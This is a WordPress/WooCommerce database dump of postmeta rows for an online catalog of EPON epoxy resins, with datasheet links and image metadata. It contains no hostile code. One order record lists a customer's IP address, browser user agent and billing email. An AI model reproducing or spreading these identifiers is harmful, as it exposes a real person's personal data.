INSERT INTO `wp_postmeta` VALUES (9101, 910, '716_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (9102, 910, '719_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (9103, 910, '318_custom_list_file', 'a:2:{s:32:"2fc39006ad1dfb65ae2e9b1eb24dfffc";a:3:{s:4:"name";s:9:"EPON 815C";s:4:"file";s:69:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/815C.pdf";s:4:"desc";s:13:"EPON 815C TDS";}s:32:"72a2e7d2ac5eab9425250c0cb021f827";a:3:{s:4:"name";s:16:"Product Overview";s:4:"file";s:90:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/curing-agent-overview-new.pdf";s:4:"desc";s:16:"Product Overview";}}'); 
INSERT INTO `wp_postmeta` VALUES (9104, 910, '317_default_editor', 'Pint, quart, gallon, 5 gallon. 55 gallon drum.'); 
INSERT INTO `wp_postmeta` VALUES (9105, 910, 'wc_productdata_options', 'a:1:{i:0;a:6:{s:11:"_bubble_new";s:0:"";s:12:"_bubble_text";s:0:"";s:17:"_custom_tab_title";s:0:"";s:11:"_custom_tab";s:0:"";s:14:"_product_video";s:0:"";s:19:"_product_video_size";s:0:"";}}'); 
INSERT INTO `wp_postmeta` VALUES (9106, 910, 'total_sales', '0'); 
INSERT INTO `wp_postmeta` VALUES (9107, 910, '_downloadable', 'no'); 
INSERT INTO `wp_postmeta` VALUES (9108, 910, '_virtual', 'no'); 
INSERT INTO `wp_postmeta` VALUES (9109, 910, '_purchase_note', ''); 
INSERT INTO `wp_postmeta` VALUES (9110, 910, '_featured', 'no'); 
INSERT INTO `wp_postmeta` VALUES (9111, 910, '_weight', ''); 
INSERT INTO `wp_postmeta` VALUES (9112, 910, '_length', ''); 
INSERT INTO `wp_postmeta` VALUES (9113, 910, '_width', ''); 
INSERT INTO `wp_postmeta` VALUES (9114, 910, '_height', ''); 
INSERT INTO `wp_postmeta` VALUES (9115, 910, '_sku', ''); 
INSERT INTO `wp_postmeta` VALUES (9116, 910, '_product_attributes', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (9117, 910, '_regular_price', ''); 
INSERT INTO `wp_postmeta` VALUES (9118, 910, '_sale_price', ''); 
INSERT INTO `wp_postmeta` VALUES (9119, 910, '_sale_price_dates_from', ''); 
INSERT INTO `wp_postmeta` VALUES (9120, 910, '_sale_price_dates_to', ''); 
INSERT INTO `wp_postmeta` VALUES (9121, 910, '_price', ''); 
INSERT INTO `wp_postmeta` VALUES (9122, 910, '_sold_individually', ''); 
INSERT INTO `wp_postmeta` VALUES (9123, 910, '_manage_stock', 'no'); 
INSERT INTO `wp_postmeta` VALUES (9124, 910, '_backorders', 'no'); 
INSERT INTO `wp_postmeta` VALUES (9125, 910, '_stock', ''); 
INSERT INTO `wp_postmeta` VALUES (9126, 910, '_upsell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (9127, 910, '_crosssell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (9128, 910, '_product_version', '2.6.4'); 
INSERT INTO `wp_postmeta` VALUES (9129, 910, '_ywtm_hide_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (9130, 910, '_ywtm_override_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (9131, 910, '_ywtm_priority_tab_reviews', '30'); 
INSERT INTO `wp_postmeta` VALUES (9132, 910, '_ywtm_title_tab_reviews', 'Reviews (%d)'); 
INSERT INTO `wp_postmeta` VALUES (9133, 910, '_product_image_gallery', ''); 
INSERT INTO `wp_postmeta` VALUES (9134, 912, '_edit_lock', '1474469837:2'); 
INSERT INTO `wp_postmeta` VALUES (9135, 912, '_edit_last', '2'); 
INSERT INTO `wp_postmeta` VALUES (9136, 913, '_wp_attached_file', '2016/08/8132.pdf'); 
INSERT INTO `wp_postmeta` VALUES (9137, 912, '_visibility', 'visible'); 
INSERT INTO `wp_postmeta` VALUES (9138, 912, '_stock_status', 'instock'); 
INSERT INTO `wp_postmeta` VALUES (9139, 912, '312_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (9140, 912, '716_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (9141, 912, '719_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (9142, 912, '318_custom_list_file', 'a:2:{s:32:"ea2f304149a3e6947739aac174e4c0b7";a:3:{s:4:"name";s:9:"EPON 8132";s:4:"file";s:69:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/8132.pdf";s:4:"desc";s:13:"EPON 8132 TDS";}s:32:"ff92899c6252b7533008f499204b4077";a:3:{s:4:"name";s:16:"Product Overview";s:4:"file";s:90:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/curing-agent-overview-new.pdf";s:4:"desc";s:16:"Product Overview";}}'); 
INSERT INTO `wp_postmeta` VALUES (9143, 912, '317_default_editor', 'Pint, quart, gallon, 5 gallon. 55 gallon drum.'); 
INSERT INTO `wp_postmeta` VALUES (9144, 912, 'wc_productdata_options', 'a:1:{i:0;a:6:{s:11:"_bubble_new";s:0:"";s:12:"_bubble_text";s:0:"";s:17:"_custom_tab_title";s:0:"";s:11:"_custom_tab";s:0:"";s:14:"_product_video";s:0:"";s:19:"_product_video_size";s:0:"";}}'); 
INSERT INTO `wp_postmeta` VALUES (9145, 912, 'total_sales', '0'); 
INSERT INTO `wp_postmeta` VALUES (9146, 912, '_downloadable', 'no'); 
INSERT INTO `wp_postmeta` VALUES (9147, 912, '_virtual', 'no'); 
INSERT INTO `wp_postmeta` VALUES (9148, 912, '_purchase_note', ''); 
INSERT INTO `wp_postmeta` VALUES (9149, 912, '_featured', 'no'); 
INSERT INTO `wp_postmeta` VALUES (9150, 912, '_weight', ''); 
INSERT INTO `wp_postmeta` VALUES (9151, 912, '_length', ''); 
INSERT INTO `wp_postmeta` VALUES (9152, 912, '_width', ''); 
INSERT INTO `wp_postmeta` VALUES (9153, 912, '_height', ''); 
INSERT INTO `wp_postmeta` VALUES (9154, 912, '_sku', ''); 
INSERT INTO `wp_postmeta` VALUES (9155, 912, '_product_attributes', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (9156, 912, '_regular_price', ''); 
INSERT INTO `wp_postmeta` VALUES (9157, 912, '_sale_price', ''); 
INSERT INTO `wp_postmeta` VALUES (9158, 912, '_sale_price_dates_from', ''); 
INSERT INTO `wp_postmeta` VALUES (9159, 912, '_sale_price_dates_to', ''); 
INSERT INTO `wp_postmeta` VALUES (9160, 912, '_price', ''); 
INSERT INTO `wp_postmeta` VALUES (9161, 912, '_sold_individually', ''); 
INSERT INTO `wp_postmeta` VALUES (9162, 912, '_manage_stock', 'no'); 
INSERT INTO `wp_postmeta` VALUES (9163, 912, '_backorders', 'no'); 
INSERT INTO `wp_postmeta` VALUES (9164, 912, '_stock', ''); 
INSERT INTO `wp_postmeta` VALUES (9165, 912, '_upsell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (9166, 912, '_crosssell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (9167, 912, '_product_version', '2.6.4'); 
INSERT INTO `wp_postmeta` VALUES (9168, 912, '_ywtm_hide_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (9169, 912, '_ywtm_override_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (9170, 912, '_ywtm_priority_tab_reviews', '30'); 
INSERT INTO `wp_postmeta` VALUES (9171, 912, '_ywtm_title_tab_reviews', 'Reviews (%d)'); 
INSERT INTO `wp_postmeta` VALUES (9172, 912, '_product_image_gallery', ''); 
INSERT INTO `wp_postmeta` VALUES (9183, 917, '_wp_attached_file', '2016/08/Solid-Epoxy-solution-EPON.jpg'); 
INSERT INTO `wp_postmeta` VALUES (9184, 917, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:6016;s:6:"height";i:4016;s:4:"file";s:37:"2016/08/Solid-Epoxy-solution-EPON.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:37:"Solid-Epoxy-solution-EPON-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:37:"Solid-Epoxy-solution-EPON-800x534.jpg";s:5:"width";i:800;s:6:"height";i:534;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:37:"Solid-Epoxy-solution-EPON-768x513.jpg";s:5:"width";i:768;s:6:"height";i:513;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:39:"Solid-Epoxy-solution-EPON-1600x1068.jpg";s:5:"width";i:1600;s:6:"height";i:1068;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:37:"Solid-Epoxy-solution-EPON-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:37:"Solid-Epoxy-solution-EPON-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:37:"Solid-Epoxy-solution-EPON-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:37:"Solid-Epoxy-solution-EPON-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:2:"-1";s:8:"quantity";d:89;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (9185, 918, '_edit_lock', '1474650515:3'); 
INSERT INTO `wp_postmeta` VALUES (9186, 918, '_edit_last', '3'); 
INSERT INTO `wp_postmeta` VALUES (9188, 919, '_wp_attached_file', '2016/08/1001-X-75.pdf'); 
INSERT INTO `wp_postmeta` VALUES (9189, 918, '_visibility', 'visible'); 
INSERT INTO `wp_postmeta` VALUES (9190, 918, '_stock_status', 'instock'); 
INSERT INTO `wp_postmeta` VALUES (9191, 918, '312_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (9192, 918, '716_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (9193, 918, '719_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (9194, 918, '318_custom_list_file', 'a:2:{s:32:"00b7d89316cc7bda050f245ac16a28b5";a:3:{s:4:"name";s:14:"EPON 1001-X-75";s:4:"file";s:74:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/1001-X-75.pdf";s:4:"desc";s:18:"EPON 1001-X-75 TDS";}s:32:"3bbe1fba862bb67c5aa96d80c266bb15";a:3:{s:4:"name";s:16:"Product Overview";s:4:"file";s:90:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/curing-agent-overview-new.pdf";s:4:"desc";s:16:"Product Overview";}}'); 
INSERT INTO `wp_postmeta` VALUES (9195, 918, '317_default_editor', 'Pint, quart, gallon, 5 gallon. 55 gallon drum.'); 
INSERT INTO `wp_postmeta` VALUES (9196, 918, 'wc_productdata_options', 'a:1:{i:0;a:6:{s:11:"_bubble_new";s:0:"";s:12:"_bubble_text";s:0:"";s:17:"_custom_tab_title";s:0:"";s:11:"_custom_tab";s:0:"";s:14:"_product_video";s:0:"";s:19:"_product_video_size";s:0:"";}}'); 
INSERT INTO `wp_postmeta` VALUES (9197, 918, 'total_sales', '0'); 
INSERT INTO `wp_postmeta` VALUES (9198, 918, '_downloadable', 'no'); 
INSERT INTO `wp_postmeta` VALUES (9199, 918, '_virtual', 'no'); 
INSERT INTO `wp_postmeta` VALUES (9200, 918, '_purchase_note', ''); 
INSERT INTO `wp_postmeta` VALUES (9201, 918, '_featured', 'no'); 
INSERT INTO `wp_postmeta` VALUES (9202, 918, '_weight', ''); 
INSERT INTO `wp_postmeta` VALUES (9203, 918, '_length', ''); 
INSERT INTO `wp_postmeta` VALUES (9204, 918, '_width', ''); 
INSERT INTO `wp_postmeta` VALUES (9205, 918, '_height', ''); 
INSERT INTO `wp_postmeta` VALUES (9206, 918, '_sku', ''); 
INSERT INTO `wp_postmeta` VALUES (9207, 918, '_product_attributes', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (9208, 918, '_regular_price', ''); 
INSERT INTO `wp_postmeta` VALUES (9209, 918, '_sale_price', ''); 
INSERT INTO `wp_postmeta` VALUES (9210, 918, '_sale_price_dates_from', ''); 
INSERT INTO `wp_postmeta` VALUES (9211, 918, '_sale_price_dates_to', ''); 
INSERT INTO `wp_postmeta` VALUES (9212, 918, '_price', ''); 
INSERT INTO `wp_postmeta` VALUES (9213, 918, '_sold_individually', ''); 
INSERT INTO `wp_postmeta` VALUES (9214, 918, '_manage_stock', 'no'); 
INSERT INTO `wp_postmeta` VALUES (9215, 918, '_backorders', 'no'); 
INSERT INTO `wp_postmeta` VALUES (9216, 918, '_stock', ''); 
INSERT INTO `wp_postmeta` VALUES (9217, 918, '_upsell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (9218, 918, '_crosssell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (9219, 918, '_product_version', '2.6.4'); 
INSERT INTO `wp_postmeta` VALUES (9220, 918, '_ywtm_hide_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (9221, 918, '_ywtm_override_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (9222, 918, '_ywtm_priority_tab_reviews', '30'); 
INSERT INTO `wp_postmeta` VALUES (9223, 918, '_ywtm_title_tab_reviews', 'Reviews (%d)'); 
INSERT INTO `wp_postmeta` VALUES (9224, 918, '_product_image_gallery', ''); 
INSERT INTO `wp_postmeta` VALUES (9231, 923, '_wp_attached_file', '2016/08/EPON-Solid-Epoxy-resins.jpg'); 
INSERT INTO `wp_postmeta` VALUES (9232, 923, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:5472;s:6:"height";i:3648;s:4:"file";s:35:"2016/08/EPON-Solid-Epoxy-resins.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:35:"EPON-Solid-Epoxy-resins-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:35:"EPON-Solid-Epoxy-resins-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:35:"EPON-Solid-Epoxy-resins-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:37:"EPON-Solid-Epoxy-resins-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:35:"EPON-Solid-Epoxy-resins-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:35:"EPON-Solid-Epoxy-resins-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:35:"EPON-Solid-Epoxy-resins-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:35:"EPON-Solid-Epoxy-resins-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"6";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (9233, 924, '_edit_lock', '1479928922:3'); 
INSERT INTO `wp_postmeta` VALUES (9234, 924, '_edit_last', '3'); 
INSERT INTO `wp_postmeta` VALUES (9235, 925, '_wp_attached_file', '2016/08/1001F.pdf'); 
INSERT INTO `wp_postmeta` VALUES (9236, 924, '_visibility', 'visible'); 
INSERT INTO `wp_postmeta` VALUES (9237, 924, '_stock_status', 'instock'); 
INSERT INTO `wp_postmeta` VALUES (9238, 924, '312_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (9239, 924, '716_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (9240, 924, '719_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (9241, 924, '318_custom_list_file', 'a:2:{s:32:"c550d3c7dd56ff3e75387a4545a08ade";a:3:{s:4:"name";s:10:"EPON 1001F";s:4:"file";s:70:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/1001F.pdf";s:4:"desc";s:14:"EPON 1001F TDS";}s:32:"72a2e7d2ac5eab9425250c0cb021f827";a:3:{s:4:"name";s:16:"Product Overview";s:4:"file";s:90:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/curing-agent-overview-new.pdf";s:4:"desc";s:16:"Product Overview";}}'); 
INSERT INTO `wp_postmeta` VALUES (9242, 924, '317_default_editor', 'Pint, quart, gallon, 5 gallon. 55 gallon drum.'); 
INSERT INTO `wp_postmeta` VALUES (9243, 924, 'wc_productdata_options', 'a:1:{i:0;a:6:{s:11:"_bubble_new";s:0:"";s:12:"_bubble_text";s:0:"";s:17:"_custom_tab_title";s:0:"";s:11:"_custom_tab";s:0:"";s:14:"_product_video";s:0:"";s:19:"_product_video_size";s:0:"";}}'); 
INSERT INTO `wp_postmeta` VALUES (9244, 924, 'total_sales', '0'); 
INSERT INTO `wp_postmeta` VALUES (9245, 924, '_downloadable', 'no'); 
INSERT INTO `wp_postmeta` VALUES (9246, 924, '_virtual', 'no'); 
INSERT INTO `wp_postmeta` VALUES (9247, 924, '_purchase_note', ''); 
INSERT INTO `wp_postmeta` VALUES (9248, 924, '_featured', 'no'); 
INSERT INTO `wp_postmeta` VALUES (9249, 924, '_weight', ''); 
INSERT INTO `wp_postmeta` VALUES (9250, 924, '_length', ''); 
INSERT INTO `wp_postmeta` VALUES (9251, 924, '_width', ''); 
INSERT INTO `wp_postmeta` VALUES (9252, 924, '_height', ''); 
INSERT INTO `wp_postmeta` VALUES (9253, 924, '_sku', ''); 
INSERT INTO `wp_postmeta` VALUES (9254, 924, '_product_attributes', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (9255, 924, '_regular_price', ''); 
INSERT INTO `wp_postmeta` VALUES (9256, 924, '_sale_price', ''); 
INSERT INTO `wp_postmeta` VALUES (9257, 924, '_sale_price_dates_from', ''); 
INSERT INTO `wp_postmeta` VALUES (9258, 924, '_sale_price_dates_to', ''); 
INSERT INTO `wp_postmeta` VALUES (9259, 924, '_price', ''); 
INSERT INTO `wp_postmeta` VALUES (9260, 924, '_sold_individually', ''); 
INSERT INTO `wp_postmeta` VALUES (9261, 924, '_manage_stock', 'no'); 
INSERT INTO `wp_postmeta` VALUES (9262, 924, '_backorders', 'no'); 
INSERT INTO `wp_postmeta` VALUES (9263, 924, '_stock', ''); 
INSERT INTO `wp_postmeta` VALUES (9264, 924, '_upsell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (9265, 924, '_crosssell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (9266, 924, '_product_version', '2.6.4'); 
INSERT INTO `wp_postmeta` VALUES (9267, 924, '_ywtm_hide_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (9268, 924, '_ywtm_override_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (9269, 924, '_ywtm_priority_tab_reviews', '30'); 
INSERT INTO `wp_postmeta` VALUES (9270, 924, '_ywtm_title_tab_reviews', 'Reviews (%d)'); 
INSERT INTO `wp_postmeta` VALUES (9271, 924, '_product_image_gallery', ''); 
INSERT INTO `wp_postmeta` VALUES (9272, 924, '_wc_review_count', '0'); 
INSERT INTO `wp_postmeta` VALUES (9312, 928, '_menu_item_type', 'post_type'); 
INSERT INTO `wp_postmeta` VALUES (9313, 928, '_menu_item_menu_item_parent', '0'); 
INSERT INTO `wp_postmeta` VALUES (9314, 928, '_menu_item_object_id', '927'); 
INSERT INTO `wp_postmeta` VALUES (9315, 928, '_menu_item_object', 'page'); 
INSERT INTO `wp_postmeta` VALUES (9316, 928, '_menu_item_target', ''); 
INSERT INTO `wp_postmeta` VALUES (9317, 928, '_menu_item_classes', 'a:1:{i:0;s:0:"";}'); 
INSERT INTO `wp_postmeta` VALUES (9318, 928, '_menu_item_xfn', ''); 
INSERT INTO `wp_postmeta` VALUES (9319, 928, '_menu_item_url', ''); 
INSERT INTO `wp_postmeta` VALUES (9320, 582, '_wc_review_count', '0'); 
INSERT INTO `wp_postmeta` VALUES (9321, 930, '_order_key', 'wc_order_57c09bed7ccca'); 
INSERT INTO `wp_postmeta` VALUES (9322, 930, '_order_currency', 'USD'); 
INSERT INTO `wp_postmeta` VALUES (9323, 930, '_prices_include_tax', 'no'); 
INSERT INTO `wp_postmeta` VALUES (9324, 930, '_customer_ip_address', '107.3.77.7'); 
INSERT INTO `wp_postmeta` VALUES (9325, 930, '_customer_user_agent', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36'); 
INSERT INTO `wp_postmeta` VALUES (9326, 930, '_customer_user', '1'); 
INSERT INTO `wp_postmeta` VALUES (9327, 930, '_created_via', 'checkout'); 
INSERT INTO `wp_postmeta` VALUES (9328, 930, '_cart_hash', '572bd902cd0b27cbede0d6fc6b3b1e4a'); 
INSERT INTO `wp_postmeta` VALUES (9329, 930, '_order_version', '2.6.4'); 
INSERT INTO `wp_postmeta` VALUES (9330, 930, '_billing_first_name', ''); 
INSERT INTO `wp_postmeta` VALUES (9331, 930, '_billing_last_name', ''); 
INSERT INTO `wp_postmeta` VALUES (9332, 930, '_billing_company', ''); 
INSERT INTO `wp_postmeta` VALUES (9333, 930, '_billing_email', 'ddillulio@mschem.com'); 
INSERT INTO `wp_postmeta` VALUES (9334, 930, '_billing_phone', ''); 
INSERT INTO `wp_postmeta` VALUES (9335, 930, '_billing_country', ''); 
INSERT INTO `wp_postmeta` VALUES (9336, 930, '_billing_address_1', ''); 
INSERT INTO `wp_postmeta` VALUES (9337, 930, '_billing_address_2', ''); 
INSERT INTO `wp_postmeta` VALUES (9338, 930, '_billing_city', ''); 
INSERT INTO `wp_postmeta` VALUES (9339, 930, '_billing_state', ''); 
INSERT INTO `wp_postmeta` VALUES (9340, 930, '_billing_postcode', ''); 
INSERT INTO `wp_postmeta` VALUES (9341, 930, '_shipping_first_name', ''); 
INSERT INTO `wp_postmeta` VALUES (9342, 930, '_shipping_last_name', ''); 
INSERT INTO `wp_postmeta` VALUES (9343, 930, '_shipping_company', ''); 
INSERT INTO `wp_postmeta` VALUES (9344, 930, '_shipping_country', ''); 
INSERT INTO `wp_postmeta` VALUES (9345, 930, '_shipping_address_1', ''); 
INSERT INTO `wp_postmeta` VALUES (9346, 930, '_shipping_address_2', ''); 
INSERT INTO `wp_postmeta` VALUES (9347, 930, '_shipping_city', ''); 
INSERT INTO `wp_postmeta` VALUES (9348, 930, '_shipping_state', ''); 
INSERT INTO `wp_postmeta` VALUES (9349, 930, '_shipping_postcode', ''); 
INSERT INTO `wp_postmeta` VALUES (9350, 930, '_payment_method', ''); 
INSERT INTO `wp_postmeta` VALUES (9351, 930, '_payment_method_title', ''); 
INSERT INTO `wp_postmeta` VALUES (9352, 930, '_order_shipping', ''); 
INSERT INTO `wp_postmeta` VALUES (9353, 930, '_cart_discount', '0'); 
INSERT INTO `wp_postmeta` VALUES (9354, 930, '_cart_discount_tax', '0'); 
INSERT INTO `wp_postmeta` VALUES (9355, 930, '_order_tax', '0'); 
INSERT INTO `wp_postmeta` VALUES (9356, 930, '_order_shipping_tax', '0'); 
INSERT INTO `wp_postmeta` VALUES (9357, 930, '_order_total', '0.00'); 
INSERT INTO `wp_postmeta` VALUES (9358, 784, '_wc_review_count', '0'); 
INSERT INTO `wp_postmeta` VALUES (9361, 918, '_wc_review_count', '0'); 
INSERT INTO `wp_postmeta` VALUES (9362, 656, '_wc_review_count', '0'); 
INSERT INTO `wp_postmeta` VALUES (9363, 783, '_wc_review_count', '0'); 
INSERT INTO `wp_postmeta` VALUES (9364, 937, '_edit_lock', '1474469528:2'); 
INSERT INTO `wp_postmeta` VALUES (9365, 937, '_edit_last', '2'); 
INSERT INTO `wp_postmeta` VALUES (9366, 938, '_wp_attached_file', '2016/08/1002F.pdf'); 
INSERT INTO `wp_postmeta` VALUES (9367, 937, '_visibility', 'visible'); 
INSERT INTO `wp_postmeta` VALUES (9368, 937, '_stock_status', 'instock'); 
INSERT INTO `wp_postmeta` VALUES (9369, 937, '312_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (9370, 937, '716_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (9371, 937, '719_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (9372, 937, '318_custom_list_file', 'a:2:{s:32:"98227e1d5b5cf55838cd622fc83ed585";a:3:{s:4:"name";s:10:"EPON 1002F";s:4:"file";s:70:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/1002F.pdf";s:4:"desc";s:14:"EPON 1002F TDS";}s:32:"ff92899c6252b7533008f499204b4077";a:3:{s:4:"name";s:16:"Product Overview";s:4:"file";s:90:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/curing-agent-overview-new.pdf";s:4:"desc";s:16:"Product Overview";}}'); 
INSERT INTO `wp_postmeta` VALUES (9373, 937, '317_default_editor', 'Quart, Gallon, 5 Gallon, 55 Gallon'); 
INSERT INTO `wp_postmeta` VALUES (9374, 937, 'wc_productdata_options', 'a:1:{i:0;a:6:{s:11:"_bubble_new";s:0:"";s:12:"_bubble_text";s:0:"";s:17:"_custom_tab_title";s:0:"";s:11:"_custom_tab";s:0:"";s:14:"_product_video";s:0:"";s:19:"_product_video_size";s:0:"";}}'); 
INSERT INTO `wp_postmeta` VALUES (9375, 937, 'total_sales', '0'); 
INSERT INTO `wp_postmeta` VALUES (9376, 937, '_downloadable', 'no'); 
INSERT INTO `wp_postmeta` VALUES (9377, 937, '_virtual', 'no'); 
INSERT INTO `wp_postmeta` VALUES (9378, 937, '_purchase_note', ''); 
INSERT INTO `wp_postmeta` VALUES (9379, 937, '_featured', 'no'); 
INSERT INTO `wp_postmeta` VALUES (9380, 937, '_weight', ''); 
INSERT INTO `wp_postmeta` VALUES (9381, 937, '_length', ''); 
INSERT INTO `wp_postmeta` VALUES (9382, 937, '_width', ''); 
INSERT INTO `wp_postmeta` VALUES (9383, 937, '_height', ''); 
INSERT INTO `wp_postmeta` VALUES (9384, 937, '_sku', ''); 
INSERT INTO `wp_postmeta` VALUES (9385, 937, '_product_attributes', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (9386, 937, '_regular_price', ''); 
INSERT INTO `wp_postmeta` VALUES (9387, 937, '_sale_price', ''); 
INSERT INTO `wp_postmeta` VALUES (9388, 937, '_sale_price_dates_from', ''); 
INSERT INTO `wp_postmeta` VALUES (9389, 937, '_sale_price_dates_to', ''); 
INSERT INTO `wp_postmeta` VALUES (9390, 937, '_price', ''); 
INSERT INTO `wp_postmeta` VALUES (9391, 937, '_sold_individually', ''); 
INSERT INTO `wp_postmeta` VALUES (9392, 937, '_manage_stock', 'no'); 
INSERT INTO `wp_postmeta` VALUES (9393, 937, '_backorders', 'no'); 
INSERT INTO `wp_postmeta` VALUES (9394, 937, '_stock', ''); 
INSERT INTO `wp_postmeta` VALUES (9395, 937, '_upsell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (9396, 937, '_crosssell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (9397, 937, '_product_version', '2.6.4'); 
INSERT INTO `wp_postmeta` VALUES (9398, 937, '_ywtm_hide_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (9399, 937, '_ywtm_override_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (9400, 937, '_ywtm_priority_tab_reviews', '30'); 
INSERT INTO `wp_postmeta` VALUES (9401, 937, '_ywtm_title_tab_reviews', 'Reviews (%d)'); 
INSERT INTO `wp_postmeta` VALUES (9402, 937, '_product_image_gallery', ''); 
INSERT INTO `wp_postmeta` VALUES (9403, 939, '_edit_lock', '1474469584:2'); 
INSERT INTO `wp_postmeta` VALUES (9404, 939, '_edit_last', '2'); 
INSERT INTO `wp_postmeta` VALUES (9405, 940, '_wp_attached_file', '2016/08/1004F.pdf'); 
INSERT INTO `wp_postmeta` VALUES (9406, 939, '_visibility', 'visible'); 
INSERT INTO `wp_postmeta` VALUES (9407, 939, '_stock_status', 'instock'); 
